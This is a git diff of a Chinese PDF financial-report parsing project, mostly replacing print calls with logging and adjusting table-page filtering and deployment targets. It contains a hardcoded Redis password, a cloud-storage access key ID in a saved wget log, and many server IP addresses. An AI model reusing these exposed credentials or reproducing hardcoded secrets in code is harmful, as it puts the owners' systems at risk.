 #指标归一化处理
@ -901,7 +923,7 @@ def update_measure_data(file_id,file_path,parent_table_pages,partition_name):
    # 创建一个cursor对象来执行SQL语句
    cursor_app = conn_app.cursor(buffered=True)
-    print(f'目录黑名单为：{parent_table_pages}')
+    logger.info(f'目录黑名单为：{parent_table_pages}')
    db_service.delete_to_run(conn,cursor,file_id)
    db_service.insert_table_measure_from_vector_async_process(cursor,parent_table_pages,file_id,file_path, partition_name)
@ -913,6 +935,44 @@ def update_measure_data(file_id,file_path,parent_table_pages,partition_name):
    cursor_app.close()
    conn_app.close()
 # def merge_consecutive_arrays(word_info):
 #     merged_objects = []
 #     temp_list = []
 #     for info_obj in word_info:
 #         try:
 #             if info_obj['type'] == 'table':
 #                 # 如果对象是表格，将其元素添加到临时列表中
 #                 data = info_obj['data']
 #                 if not data:
 #                     continue
 #                 first_row = data[0]
 #                 if all(re.search(r'[\u4e00-\u9fa5]', cell) for cell in first_row[1:]) and  len(temp_list) == 0:
 #                     temp_list.append(info_obj)
 #                 elif all(re.search(r'[\u4e00-\u9fa5]', cell) for cell in first_row[1:]) and len(temp_list) > 0:
 #                     merged_objects.append(temp_list)
 #                     temp_list = []
 #                     temp_list.append(info_obj)
 #                 elif not all(re.search(r'[\u4e00-\u9fa5]', cell) for cell in first_row[1:]) and len(temp_list) > 0:
 #                     temp_data = temp_list[-1]['data']
 #                     temp_data = list(temp_data)
 #                     for row in  list(info_obj['data']):
 #                         temp_data.append(row)
 #                     info_obj['data'] = temp_data
 #                     temp_list.clear()
 #                     temp_list.append(info_obj)
 #         except Exception as e:
 #             applog.error(f"解析数据错误: {e}")
 #     if temp_list:
 #         merged_objects.append(temp_list)    
 #     return merged_objects
 def merge_consecutive_arrays(pdf_info):
    merged_objects = []
    temp_array = {}
@ -941,7 +1001,7 @@ def merge_consecutive_arrays(pdf_info):
                    temp_array = {}  # 重置临时列表
        except Exception as e:
            #print(info_obj)
-            print(f"解析数据错误: {e}")
+            logger.info(f"解析数据错误: {e}")
    if temp_array:
        merged_objects.append(temp_array)    
@ -980,7 +1040,7 @@ def merge_consecutive_arrays_v1(pdf_info):
                    merged_objects.append(temp_array)
                    temp_array = {}  # 重置临时列表
        except Exception as e:
-            print(f"解析数据错误: {e}")
+            logger.info(f"解析数据错误: {e}")
    # 循环结束后，检查临时列表是否非空，如果非空，则添加到结果中
    if temp_array:
@ -1017,7 +1077,7 @@ def start_table_measure_job(file_id,partition_name):
    redis_client.close()
    records_range_parts = utils.get_range(len(pdf_tables),MEASURE_COUNT)
-    print(f'records_range_part识别页码的值为{records_range_parts}')
+    logger.info(f'records_range_part识别页码的值为{records_range_parts}')
    processes = []
--- a/zzb_data_prod/nohup.out
+++ b/zzb_data_prod/nohup.out
--- a/zzb_data_prod/pdf_title.py
+++ b/zzb_data_prod/pdf_title.py
@ -157,7 +157,7 @@ def create_text_outline(pdf_path, file_id):
                if len(re.findall('财务报表主要项目注释', title)) == 0:
                    page_end = page_end - 1
                # print(title,page_start,page_end)
-                for i in range(page_start, page_end + 1):
+                for i in range(page_start, page_end):
                    # 将每个数字添加到列表中
                    parent_table_pages_local[file_id].append(i) 
        file_info['page_count'] = page_count
@ -168,6 +168,68 @@ def create_text_outline(pdf_path, file_id):
        return file_info
 def create_text_outline_disclosure(pdf_path, file_id):
    # print('Running the script for [%s] with padding [%d]' % (pdf_path, page_number_padding))
    # creating an object
    with open(pdf_path, 'rb') as file:
        file_info = {}
        fileReader = PyPDF2.PdfReader(file)
        page_count = len(fileReader.pages)
        redis_client = redis.Redis(host=REDIS_HOST, port=REDIS_PORT, password=REDIS_PASSWORD, db=6)
        redis_client.set(f'page_count_{file_id}', page_count)
        info = {
            'page_count': page_count,
            'all_pages': {},
            'current_page_id': 1,
            'padding': 0
        }
        print('Number of pages: %d' % info['page_count'])
        pages = fileReader.trailer['/Root']['/Pages'].get_object()
        recursive_numbering(pages, info)
        #for page_num, page in enumerate(pages['/Kids']):
        #    page_obj = page.getObject()
        #    all_pages[id(page_obj)] = page_num + 1 # who starts counting from 0 anyways?
        title_array = get_tree_pages(fileReader.outline, info, 0, [])
        #db_service.pdf_title_insert_mysql(file_id,title_array)
        #title_array = db_service.get_file_info_from_mysql(file_id)
        parent_table_pages_local = {}
        parent_table_pages_local[file_id] = []
        print(f'{file_id}:{len(title_array)}')
        for i in range(len(title_array)):
            title_obj = title_array[i]
            title  = title_obj['title']
            #print(f'标题分别是{title}')
            if len(re.findall('母公司|现金流量表补充|重要会计政策|会计估计变更|公允价值的披露|合营安排或联营企业中的权益|与金融工具相关的风险|税项|主要控股参股公司|结构化主体情况|公司股份总数及股东结构变动及公司资产和负债结构的变动情况|所有权或使用权受到限制的资产|在建工程|固定资产|其他主体中的权益|分部信息|与金融工具相关的风险|其他关联交易|公司子公司重大事项', title)) >0 :
                page_start = title_obj['page_num']
                depth = title_obj['depth']
                if i < len(title_array) - 1:
                    page_end = title_array[i+1]['page_num']
                    if title_array[i]['depth'] in [1,2]:
                        page_end = get_page_end(i+1, depth, title_array)
                else:
                    page_end = page_count
                print(f'目录识别时被丢弃的页码：{page_start}-{page_end}')
                #当标题为母公司财务报表主要项目注释时，最后一页不过滤，避免核心roe指标无法召回
                if len(re.findall('财务报表主要项目注释', title)) == 0:
                    page_end = page_end - 1
                # print(title,page_start,page_end)
                for i in range(page_start, page_end + 1):
                    # 将每个数字添加到列表中
                    parent_table_pages_local[file_id].append(i)
        file_info['page_count'] = page_count
        file_info['parent_table_pages'] = parent_table_pages_local[file_id]
        file_info['split_parts'] = get_file_split(page_count)
        redis_client.close()
        return file_info
 if __name__ == '__main__':
    import time
    path = "/Users/zhengfei/Desktop/cb/2023年报检测/安妮股份.pdf"
--- a/zzb_data_prod/put_code.sh
+++ b/zzb_data_prod/put_code.sh
@ -2,18 +2,18 @@
 # 设置文件路径和目标目录#   请注意这列的config文件是不可以进行传输的  /root/pdf_parser/zzb_data_prod/utils.py /root/pdf_parser/zzb_data_prod/db_service.py
 #FILES="/root/pdf_parser/zzb_data_prod/utils.py /root/pdf_parser/zzb_data_prod/db_service.py /root/pdf_parser/zzb_data_prod/app.py /root/pdf_parser/zzb_data_prod/main.py /root/pdf_parser/zzb_data_prod/pdf_title.py"
-FILES="/root/pdf_parser/zzb_data_prod/main.py"
+FILES="/root/pdf_parser/zzb_data_prod/put_code.sh"
 DEST_PATH="/root/pdf_parser/zzb_data_prod"
 # 设置服务器列表 主服务器 "1.94.143.23"  "113.44.72.157" "1.94.101.237" "123.60.16.225" "124.71.157.162" "1.94.60.103" "1.94.143.23" "124.71.149.225" "113.44.52.221" "121.37.137.13"
 #SERVERS=("113.44.72.157" "1.94.101.237" "123.60.16.225" "124.71.157.162" "1.94.60.103"  "124.71.149.225" "113.44.52.221" "121.37.137.13" "123.60.28.83" "192.168.0.19" "192.168.0.53" "192.168.0.150" "192.168.0.210" "192.168.0.129" "192.168.0.24" "192.168.0.250" "192.168.0.162" "192.168.0.86" "192.168.0.88" "192.168.0.93" "192.168.0.228" "192.168.0.155" "192.168.0.186" "192.168.0.56" "192.168.0.185" "192.168.0.72" "192.168.0.35" "192.168.0.230" "192.168.0.125" "192.168.0.46" "192.168.0.131")
 #SERVERS=("192.168.0.228" "192.168.0.155" "192.168.0.186" "192.168.0.56" "192.168.0.185")
 #监管服务器
-SERVERS=("192.168.0.108" "192.168.0.131")
+#SERVERS=("192.168.0.108" "192.168.0.131")
 #企业服务器
 #SERVERS=("192.168.0.163" "192.168.0.26" "192.168.0.2" "192.168.0.128" "192.168.0.136" "192.168.0.239")
 #两者一起
-#SERVERS=("192.168.0.163" "192.168.0.26" "192.168.0.2" "192.168.0.128" "192.168.0.136" "192.168.0.239" "192.168.0.108" "192.168.0.131")
+SERVERS=("192.168.0.163" "192.168.0.26" "192.168.0.2" "192.168.0.128" "192.168.0.136" "192.168.0.239" "192.168.0.108" "192.168.0.131")
 # 遍历每个服务器并上传文件
 for SERVER in "${SERVERS[@]}"; do
    echo "Uploading files to $SERVER"
--- a/zzb_data_prod/requirements.txt
+++ b/zzb_data_prod/requirements.txt
@ -11,3 +11,5 @@ uvicorn
 redis
 ghostscript
 opencv-python-headless
 python-docx
 docx2pdf
--- a/zzb_data_prod/space/utils.py
+++ b/zzb_data_prod/space/utils.py
@ -9,6 +9,8 @@ import re,os,time
 import requests
 import config
 import numpy as np
 import logging
 log = logging.getLogger(__name__)
 def get_md5(str):
    import hashlib
@ -29,13 +31,13 @@ def embed_with_str(input):
        if resp.status_code == HTTPStatus.OK:
            return resp
        elif resp.status_code == 429:
-            print(f'触发限流,等待{t}秒后重试')
+            log.info('触发限流,等待%s秒后重试', t)
            retry += 1
            t+=0.1
        else:
-            print(f'请求失败,状态码:{resp.status_code}')
+            log.info('请求失败,状态码:%s', resp.status_code)
            return None
-    print('重试超过上限')
+    log.info('重试超过上限')
    return None
 #如果存在‘归属于|扣非’，就保留括号内的内容，并去掉标点符号和中文数字。
@ -111,10 +113,10 @@ def save_pdf_from_url(url, file_path):
        with open(local_file_path, 'wb') as file:
            file.write(response.content)
-            print(f"文件已下载到 {local_file_path}")
+            log.info("文件已下载到 %s", local_file_path)
    else:
        # 文件下载失败
-        print(f"无法下载文件，状态码：{response.status_code}")
+        log.info("无法下载文件，状态码：%s", response.status_code)
    return local_file_path
@ -225,7 +227,15 @@ def get_percent_growth(text):
 def check_black_list(meta_measure,pdf_measure):
    # 判断指标名是否包含黑名单词
-    #black_array = ['非经常性损益:非经常性损益合计,非经常性损益总额','营业收入:营业外收入,主营业务,营业总收入,扣除,年度公司','归母净利润:净资产,净利率,扣除,年度公司','扣非净利润:净资产,净利率,年度公司','经营活动现金流净额:筹资活动,投资活动,流入小计,流出小计','筹资活动现金流净额:经营活动,投资活动,流入小计,流出小计','投资活动现金流净额:经营活动,筹资活动,流入小计,流出小计','非经常性损益:扣除非经常性损益','基本每股收益:稀释每股收益','稀释每股收益:基本每股收益','总资产:净资产','应收账款:应付账款','短期借款:长期借款','应付账款:应收账款','长期借款:短期借款','研发投入:比例,比率,占比,费用','资本化研发投入:比例,比率,占比,费用','资本化研发投入占比:金额,费用','研发投入占营业收入比例:金额,费用','上年年末:1月1日']
+    #black_array = ['非经常性损益:非经常性损益合计,非经常性损益总额','营业收入:营业外收入,主营业务,营业总收入,扣除,年度公司','归母净利润:净资产,净利率,扣除,年度公司','扣非净利润:净资产,净利率,年度公司','经营活动现金流净额:筹资活动,投资活动,流入小计,流出小计','筹资活动现金流净额:经营活动,投资活动,流入小计,流出小计','投资活动现金流净额:经营活动,筹资活动,流入小计,流出小计','非经常性损益:扣除非经常性损益','基本每股收益:稀释每股收益','稀释每股收益:基本每股收益','总资产:净资产','应收账款:应付账款','短期借款:长期借款','应付账款:应收账款','长期借款:短期借款','研发投入:比例,比率,占比,费用','资本化研发投入:比例,比率,占比,费用','资本化研发投入占比:金额,费用','研发投入占营业收入比例:金额,费用']
 #     for black in black_array:
 #         black_meta = black.split(':')[0]
 #         black_pdfs = black.split(':')[1].split(',')
 #         if meta_measure.find(black_meta) >= 0:
 #             for pdf in black_pdfs:
 #                 if pdf_measure.find(pdf) >= 0:
 #                     return True
 #     return False
    black_array = ['非经常性损益:非经常性损益合计,非经常性损益总额,合计','营业收入:营业外收入,主营业务,营业总收入,扣除,年底公司,合计,汇总'
                   ,'归母净利润:净资产,净利率,扣除,年度公司','扣非净利润:净资产,净利率,年度公司'
                   ,'经营活动现金流净额:筹资活动,投资活动,流入小计,流出小计,每股,扣除','筹资活动现金流净额:经营活动,投资活动,流入小计,流出小计,每股,扣除'
@ -344,17 +354,17 @@ def get_change_rate_flag(text):
 if __name__ == '__main__':
-    print(under_non_alpha_ratio('②2022年度'))
+    log.info(under_non_alpha_ratio('②2022年度'))
    # title = '母公司财务报表主要项目注释'
    # if len(re.findall('母公司|现金流量表补充', title)) >0 and len(re.findall('项目注释', title)) == 0:
-    #     print('1')
+    #     log.info('1')
    # else:
-    #     print('0')
+    #     log.info('0')
-    # print(check_black_list('当期投资活动现金流净额','当前筹资活动现金流净额'))
+    # log.info(check_black_list('当期投资活动现金流净额','当前筹资活动现金流净额'))
    # test = '2023年1-12月'
-    # print(get_period_type('上年度本期费用化研发投入'))
+    # log.info(get_period_type('上年度本期费用化研发投入'))
-    # print(get_period_type('费用化研发投入本年度'))
+    # log.info(get_period_type('费用化研发投入本年度'))
    # vector_a = embed_with_str('第一季度营业收入')
    # vector = vector_a.output["embeddings"][0]["embedding"]
@ -362,7 +372,7 @@ if __name__ == '__main__':
    # vector1 = vector_b.output["embeddings"][0]["embedding"]
    # similarity = cosine_similarity(vector, vector1)
-    # print(f"余弦相似度: {similarity}")
+    # log.info("余弦相似度: %s", similarity)
    # measure_data = [
    #     '1,1,营业收入2023年金额,1003535799.51',
@ -577,21 +587,14 @@ if __name__ == '__main__':
    # )
    # vector_obj = embed_with_str('2023年营业收入')
    # vector = vector_obj.output["embeddings"][0]["embedding"]
    # data = [vector]
    # res = client.search(
    #     collection_name="zzb_measure", # Replace with the actual name of your collection
    #     # Replace with your query vector
    #     data=data,
    #     limit=1, # Max. number of search results to return
    #     search_params={"metric_type": "COSINE", "params": {}}, # Search parameters
    #     output_fields=["measure_name","measure_value"]
    # )
-    # # Convert the output to a formatted JSON string
+    # vector_b = embed_with_str('营业收入第一季度')
-    # result = json.dumps(res, indent=4, ensure_ascii=False)
+    # vector1 = vector_b.output["embeddings"][0]["embedding"]
-    # print(result)
+
    # similarity = cosine_similarity(vector, vector1)
    # log.info("余弦相似度: %s", similarity)
    # insert_measure_data(client, measure_data)
    # text = '营业收入第一季度（1-3月份）'
    # new_text = re.sub(r'（[^)]*）', '',text)
-    # print(new_text)
+    # log.info(new_text)
--- a/zzb_data_prod/test.pdf
+++ b/zzb_data_prod/test.pdf
@ -0,0 +1,3 @@
 --2024-12-27 11:23:36--  https://financial-report.obs.cn-east-3.myhuaweicloud.com/upload/file/44b374ac0fe140a2922c360db47335a1.PDF?AccessKeyId=WMBIZTLULUR24OBUIRC4
 Resolving financial-report.obs.cn-east-3.myhuaweicloud.com (financial-report.obs.cn-east-3.myhuaweicloud.com)... failed: Name or service not known.
 wget: unable to resolve host address ‘financial-report.obs.cn-east-3.myhuaweicloud.com’
--- a/zzb_data_prod/test.py
+++ b/zzb_data_prod/test.py
@ -1,154 +1,14 @@
-#coding=utf-8
+# -*- coding: utf-8 -*-
-import sys,ast
+import re
 from pdfminer.high_level import extract_text
 from pdfminer.pdfparser import PDFParser
 from pdfminer.pdfdocument import PDFDocument
 from pdfminer.pdfpage import PDFPage
 import utils
 import mysql.connector
 from pymilvus import connections,MilvusClient
 import json
 import db_service
 import ast
 import numpy as np
 import config
 import redis_service
 from config import MILVUS_CLIENT,MYSQL_HOST,MYSQL_USER,MYSQL_PASSWORD,MYSQL_DB
 import main
 import redis
 def measure_config_to_db(conn,cursor):
    insert_query = '''
                INSERT INTO measure_config
                (measure_id, measure_name, ori_measure_id, ori_measure_name) 
                VALUES (%s, %s, %s, %s)
                '''
    check_query = '''
                select ori_measure_id from measure_config
                '''
    # 打开文本文件
    with open('/Users/zhengfei/work/zzb_data/measure_config_all.txt', 'r') as file:
        # 读取所有行到一个列表中
        lines = file.readlines()
    # 打印每一行
    for line in lines:
        config_list = line.strip().split(',')
        measure = config_list[0]
        ori_measure = config_list[1]
        ori_measure_id = utils.get_md5(ori_measure)
        # 判断数据库中是否有数据
        # cursor.execute(check_query.format(ori_measure_id=ori_measure_id))
        # check_records = cursor.fetchall()
        # if(len(check_records)) > 0:
        #     continue
        data_to_insert = (utils.get_md5(measure), measure, ori_measure_id, ori_measure)
        cursor.execute(insert_query, data_to_insert)
        conn.commit()   
 def insert_measure_vector(conn,cursor):
    redis_client = redis.Redis(host='192.168.0.172', port=6379, password='Xgf_redis', db=6)
    # 执行SQL语句，更新数据
    select_query = '''
                SELECT ori_measure_id,ori_measure_name FROM measure_config
                '''
    cursor.execute(select_query)
    records = cursor.fetchall()
    for record in records:
        if redis_client.hexists('measure_config', record[0]):
            measure_vector = redis_client.hget('measure_config', record[0])
        else:
            print('新增指标',record[1])
            vector_obj = utils.embed_with_str(record[1])
            measure_vector = str(vector_obj.output["embeddings"][0]["embedding"])
        redis_client.hset('measure_config', record[0], measure_vector)
    redis_client.close()
    conn.close()
 def contains_financial_indicators(text):
    import re
    # 正则表达式模式匹配千分位格式的数字和百分比
    pattern = r"\d{1,3}(,\d{3})+(\.\d{1,3})?"
    pattern1 = r"\d+(.\d+)+%?"
    # 使用 re.search 函数查找匹配项
    match = re.search(pattern1, text)
    # 如果找到匹配项，返回 True，否则返回 False
    return bool(match)
 def get_clean_text(text):
    import re
    pattern = r"\（[^)]*?\）"
    matches = re.findall(pattern, text)
    for match in matches:
        # 使用 re.findall 函数查找括号内的内容中是否包含月份或关键词
        month_keywords_found = re.search(r"归属于|扣非", match)
        if not month_keywords_found:
            # 如果包含，则从文本中删除该部分
            text = re.sub(pattern,"", text)
        else:
            # 如果不包含，删除所有标点符号和中文数字
            text = re.sub(r"[^\w\s]", "", text)  
    print(text)
 def insert_and_update(conn,cursor,client,parent_table_pages,file_id,path):
    # #通过向量查询指标
    db_service.insert_table_measure_from_vector(conn,cursor,client,parent_table_pages,file_id,path)
    # #指标归一化处理
    db_service.update_ori_measure(conn,cursor,file_id)
 def print_measure_data(cursor,client):
    select_query = '''
                    SELECT ori_measure_name,measure_name,ori_measure_id  FROM measure_config
                    where measure_id not in(select distinct measure_id  from ori_measure_list  where file_id='64')
                '''
    cursor.execute(select_query)
    records = cursor.fetchall()
    for record in records:
        ori_measure_name = record[0]
        measure_name = record[1]
        ori_measure_id = record[2]
        measure_vector = redis_service.read_from_redis(ori_measure_id)
        measure_list = ast.literal_eval(measure_vector)
        data = [measure_list]
        res = client.search(
            collection_name="pdf_measure_v4", # Replace with the actual name of your collection
            # Replace with your query vector
            data=data,
            limit=2, # Max. number of search results to return
            search_params={"metric_type": "COSINE", "params": {}}, # Search parameters
            output_fields=["measure_name","measure_value","table_num","table_index"],
            filter = 'file_id == "64"'
        )
        vector_str = measure_name+":"+ori_measure_name 
        # Convert the output to a formatted JSON string
        for i in range(len(res[0])):
            vector_distance = float(res[0][i]["distance"])
            vector_measure_name = res[0][i]["entity"]["measure_name"]
            measure_value = res[0][i]["entity"]["measure_value"]
            table_num = res[0][i]["entity"]["table_num"]
            table_index = res[0][i]["entity"]["table_index"]
            table_num_list = [106]
            print(vector_str +":"+vector_measure_name+":"+str(vector_distance) +":"+measure_value +":"+str(table_num) +":"+str(table_index))
            # if vector_distance > 0.89 and table_num not in table_num_list:
            #     print(vector_str +":"+vector_measure_name+":"+str(vector_distance) +":"+measure_value +":"+str(table_num) +":"+str(table_index)+":"+str(0.94))
            # if vector_distance > distance and table_num not in table_num_list:   
            #     print(vector_str +":"+vector_measure_name +":"+measure_value +":"+str(table_num) +":"+str(table_index)+":"+str(vector_distance)+":"+str(distance))
 list1 = [['2．将重分类进损益的其他综合收益', '', '-135441.46', '58032.20'], ['（1）权益法下可转损益的其他综合收益', '', '', ''], ['（2）其他债权投资公允价值变动', '', '', ''], ['（3）金融资产重分类计入其他综合收益的金额', '', '', ''], ['（4）其他债权投资信用减值准备', '', '', ''], ['（5）现金流量套期储备', '', '', ''], ['（6）外币财务报表折算差额', '', '-135441.46', '58032.20'], ['（7）其他', '', '', ''], ['（二）归属于少数股东的其他综合收益的税后净额', '', '', ''], ['七、综合收益总额', '', '-154059285.14', '15109700.10'], ['（一）归属于母公司所有者的综合收益总额', '', '-153881248.66', '15109700.10'], ['（二）归属于少数股东的综合收益总额', '', '-178036.48', ''], ['八、每股收益：', '八、每股收益：', '八、每股收益：', '八、每股收益：'], ['（一）基本每股收益(元/股)  -0.6693 0.0715', '（一）基本每股收益(元/股)  -0.6693 0.0715', '（一）基本每股收益(元/股)  -0.6693 0.0715', '（一）基本每股收益(元/股)  -0.6693 0.0715'], ['（二）稀释每股收益(元/股)  -0.6693 0.0714', '（二）稀释每股收益(元/股)  -0.6693 0.0714', '（二）稀释每股收益(元/股)  -0.6693 0.0714', '（二）稀释每股收益(元/股)  -0.6693 0.0714']]
 # 测试代码
 if __name__ == "__main__":
    conn = mysql.connector.connect(
        host=MYSQL_HOST,
        user=MYSQL_USER,
        password=MYSQL_PASSWORD,
        database=MYSQL_DB
    )
    cursor = conn.cursor()
-    insert_measure_vector(conn,cursor)
+     for lines in list1: 
         line = list(set(lines))
         print(line)
--- a/zzb_data_prod/test/pdf_ex.py
+++ b/zzb_data_prod/test/pdf_ex.py
@ -7,6 +7,8 @@ from pdfminer.layout import LTTextContainer, LTChar, LTRect, LTFigure
 import pdfplumber
 import os
 import logging
 log = logging.getLogger(__name__)
 # 创建一个文本提取函数
@ -125,8 +127,8 @@ for pagenum, page in enumerate(extract_pages(pdf_path)):
                upper_side = element.y1 
                # 从表中提取信息
                table = extract_table(pdf_path, pagenum, table_num)
-                # print('第'+str(pagenum)+'页第'+str(table_num)+'个表格')
+                # log.info('第%s页第%s个表格', str(pagenum), str(table_num))
-                # print(table)
+                # log.info(table)
                # 将表信息转换为结构化字符串格式
                table_string = table_converter(table)
                # 将表字符串追加到列表中
@ -148,15 +150,15 @@ for pagenum, page in enumerate(extract_pages(pdf_path)):
                    first_element = True
                    table_num+=1
-    print('第'+str(pagenum)+'部分')
+    log.info('第%s部分', str(pagenum))
-    print('page_text:')
+    log.info('page_text:')
-    print(page_text)
+    log.info(page_text)
-    #print('line_format:')
+    #log.info('line_format:')
-    #print(line_format)
+    #log.info(line_format)
-    #print('text_from_tables:')
+    #log.info('text_from_tables:')
-    #print(text_from_tables)
+    #log.info(text_from_tables)
-    #print('page_content:')
+    #log.info('page_content:')
-    #print(page_content)
+    #log.info(page_content)
    # 创建字典的键
    dctkey = 'Page_'+str(pagenum)
@ -171,7 +173,7 @@ pdfFileObj.close()
 # 显示页面内容
 # result = ''.join(text_per_page['Page_0'][4])
-# print(result)
+# log.info(result)
 # result1 = ''.join(text_per_page['Page_1'][4])
-# print(result1)
+# log.info(result1)
--- a/zzb_data_prod/test/pdf_parser.py
+++ b/zzb_data_prod/test/pdf_parser.py
@ -4,6 +4,9 @@ import PyPDF2
 from pdfminer.high_level import extract_pages
 from pdfminer.layout import LTTextContainer, LTRect
 import pdfplumber
 import logging
 log = logging.getLogger(__name__)
 import os
@ -82,7 +85,7 @@ for pagenum, page in enumerate(extract_pages(pdf_path)):
    text_obj['page_num'] = pagenum
    text_obj['text'] = page_text
-    print("pagenum:",pagenum,"  text:",page_text)
+    log.info("pagenum: %s  text: %s", pagenum, page_text)
 # 打印提取的文本
-# print(page_obj)
+# log.info(page_obj)
--- a/zzb_data_prod/test/test_pdf.py
+++ b/zzb_data_prod/test/test_pdf.py
@ -1,5 +1,7 @@
 import os 
 import re 
 import logging
 log = logging.getLogger(__name__)
 from tqdm import tqdm 
 from pdfminer.pdfparser import  PDFParser,PDFDocument
 from pdfminer.pdfinterp import PDFResourceManager, PDFPageInterpreter
@ -24,7 +26,7 @@ def pdf_parse(pdf_path,txt_path):
    #检测文档是否提供txt转换，不提供就忽略
    if not doc.is_extractable:
-        print(pdf_path)
+        log.info(pdf_path)
        raise PDFTextExtractionNotAllowed
    else:
        #创建PDF，资源管理器，来共享资源
@ -48,7 +50,7 @@ def pdf_parse(pdf_path,txt_path):
                if(isinstance(x,LTTextBoxHorizontal)):
                    with open(txt_path,'a') as f:
                        results = x.get_text()
-                        # print(results)
+                        # log.info(results)
                        f.write(results  +"\n")
@ -68,5 +70,5 @@ if __name__ == '__main__':
            txt_path = save_txt_path+txt_name
            pdf_parse(pdf_path, txt_path)
        except:
-            print("转换失败：", pdf_name)
+            log.info("转换失败：%s", pdf_name)
            continue
--- a/zzb_data_prod/test/zzb.py
+++ b/zzb_data_prod/test/zzb.py
@ -4,6 +4,8 @@ import os
 import json
 import numpy as np
 from datetime import datetime
 import logging
 logger = logging.getLogger(__name__)
 # 读取PDF
 import PyPDF2
 # 分析PDF的layout，提取文本
@ -230,7 +232,7 @@ def get_measure_from_llm(user_prompt):
        llm_measure_list = result.split('\n')
        return llm_measure_list
    else:
-        print('Request id: %s, Status code: %s, error code: %s, error message: %s' % (
+        logger.error('Request id: %s, Status code: %s, error code: %s, error message: %s' % (
            response.request_id, response.status_code,
            response.code, response.message
        ))
@ -270,7 +272,7 @@ def parse_llm_measure_to_db(measure_info,type,conn,cursor):
            ori_measure_id = get_md5(ori_measure_name)
        data_to_insert = (file_id, file_name, type, int(page_num), int(table_index), ori_measure_id, ori_measure_name, ori_measure_value, create_time, create_time)
        cursor.execute(insert_query, data_to_insert)
-        print(f"{type},{page_num},{table_index},{ori_measure_name},{ori_measure_value}") 
+        logger.info(f"{type},{page_num},{table_index},{ori_measure_name},{ori_measure_value}") 
    # 提交事务
    conn.commit()
@ -300,7 +302,7 @@ def update_ori_measure(conn,cursor):
 if __name__ == "__main__":
    start_time = datetime.now()
-    print("开始时间：", start_time.strftime("%Y-%m-%d %H:%M:%S"))
+    logger.info("开始时间：", start_time.strftime("%Y-%m-%d %H:%M:%S"))
    path = "/Users/zhengfei/Desktop/科润智控1.pdf"
    table_info = get_table_measure(path)
@ -324,10 +326,10 @@ if __name__ == "__main__":
        table_index = table_obj['page_num'].split("_")[1]
        table_measure = ','.join(table_obj['measure_list'])
        if table_page_num == '3':
-            print(f"第{table_page_num}页表格指标为：{table_measure}")
+            logger.info(f"第{table_page_num}页表格指标为：{table_measure}")
        table_llm_measure = get_measure_from_llm(table_measure)
        if table_page_num == '3':
-            print(f"第{table_page_num}页表格llm指标为：{table_llm_measure}")
+            logger.info(f"第{table_page_num}页表格llm指标为：{table_llm_measure}")
        # table_measure_obj['page_num'] = table_page_num
        # table_measure_obj['table_index'] = table_index
        # table_measure_obj['llm_measure'] = table_llm_measure
@ -352,5 +354,5 @@ if __name__ == "__main__":
    # parse_llm_measure_to_db(measure_info)
    # get_measure_from_llm()
    end_time = datetime.now()
-    print("结束时间：", end_time.strftime("%Y-%m-%d %H:%M:%S"))
+    logger.info("结束时间：", end_time.strftime("%Y-%m-%d %H:%M:%S"))
    #print(pdf_data)
--- a/zzb_data_prod/test_0711.py
+++ b/zzb_data_prod/test_0711.py
@ -19,6 +19,8 @@ from pymilvus import MilvusClient
 #import pdf_title
 import numpy as np
 #from multiprocessing import Process
 import logging
 logger = logging.getLogger(__name__)
@ -81,9 +83,9 @@ def get_text_content_test(file_path,file_id,pages,tables_range):
                                    # 记录需要过滤掉的页码
                                    if len(re.findall('母公司|现金流量表补充', line_text)) > 0:
-                                        print('成功识别到了')
+                                        logger.info('成功识别到了')
        except Exception as e:
-            print(f"Error processing page {pagenum+1}: {e}")
+            logger.error(f"Error processing page {pagenum+1}: {e}")
 pdf_path = r"combined_v61.pdf"
 file_id = 1
--- a/zzb_data_prod/test_0711_v2.py
+++ b/zzb_data_prod/test_0711_v2.py
@ -19,6 +19,8 @@ from pymilvus import MilvusClient
 #import pdf_title
 import numpy as np
 #from multiprocessing import Process
 import logging
 logger = logging.getLogger(__name__)
 STR_PATTERN = '营业收入|净利润|变动比例|损益|现金流量净额|现金净流量|现金流|每股收益|总资产|资产总额|收益率|货币资金|应收账款|存货|固定资产|在建工程|商誉|短期借款|应付账款|合同负债|长期借款|营业成本|销售费用|管理费用|财务费用|研发费用|研发投入'
 #负责表内一旦出现某个字符，整个表丢弃
@ -202,7 +204,7 @@ tables_range = {}
 #     print('Task %s runs %0.2f seconds.' % (f'解析表格{pages}', (end - start)))
 def get_table_range_test(file_path, file_id, pages, tables_range):
-    print('Run task %s (%s)...' % (f'解析表格{pages}', os.getpid()))
+    logger.info('Run task %s (%s)...' % (f'解析表格{pages}', os.getpid()))
    start = time.time()
    # conn = mysql.connector.connect(
@ -295,7 +297,7 @@ def get_table_range_test(file_path, file_id, pages, tables_range):
                'table_index' : table_index,
                'page_num' : page_num,
            })
-            print(f"tables_range的值是{tables_range}")
+            logger.debug(f"tables_range的值是{tables_range}")
    #         db_service.insert_pdf_parse_process({
    #         'file_id': file_id,
@ -319,7 +321,7 @@ def get_table_range_test(file_path, file_id, pages, tables_range):
    # redis_client.close()
    end = time.time()
-    print('Task %s runs %0.2f seconds.' % (f'解析表格{pages}', (end - start)))
+    logger.info('Task %s runs %0.2f seconds.' % (f'解析表格{pages}', (end - start)))
 get_table_range_test(file_path, file_id, pages, tables_range)
--- a/zzb_data_prod/utils.py
+++ b/zzb_data_prod/utils.py
@ -10,6 +10,12 @@ import requests
 import config
 import numpy as np
 from docx2pdf import convert
 from config import api_key
 import logging
 logger = logging.getLogger(__name__)
 dashscope.api_key = api_key
 def get_md5(str):
    import hashlib
@ -20,25 +26,27 @@ def get_md5(str):
 def embed_with_str(input):
    retry = 0
    max_retry = 5
-    t = 0.1 
+    t = 0.2
    while retry < max_retry:
        # time.sleep(t)
        #阿里接口限流 
        time.sleep(t)
        resp = dashscope.TextEmbedding.call(
            model=dashscope.TextEmbedding.Models.text_embedding_v2,
            input=input)
        if resp.status_code == HTTPStatus.OK:
            return resp
        elif resp.status_code == 429:
-            print(f'触发限流,等待{t}秒后重试')
+            logger.info(f'触发限流,等待{t}秒后重试')
            retry += 1
            t+=0.1
        else:
-            print(f'请求失败,状态码:{resp.status_code}')
+            logger.error(f'请求失败,状态码:{resp.status_code}')
            return None
-    print('重试超过上限')
+    logger.error('重试超过上限')
    return None
 #如果存在‘归属于|扣非’，就保留括号内的内容，并去掉标点符号和中文数字。
 #如果存在季度关键词，就将括号内容替换为季度
 #如果存在‘±’，就将括号内容替换为同期增减
@ -89,7 +97,7 @@ def get_clean_text(text):
        return pattern.sub(lambda match: replacements[match.group(0)], text)
